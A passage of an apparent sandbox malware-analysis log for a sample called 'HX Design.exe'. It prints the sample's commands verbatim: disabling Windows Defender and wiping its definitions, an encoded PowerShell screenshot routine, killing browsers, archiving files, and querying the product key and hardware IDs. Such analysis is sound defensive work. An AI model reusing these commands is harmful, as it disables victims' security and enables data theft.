AAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,73_2_00007FF77D23B340
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732089570 cpuid 0_2_00007FF732089570
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\certifi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
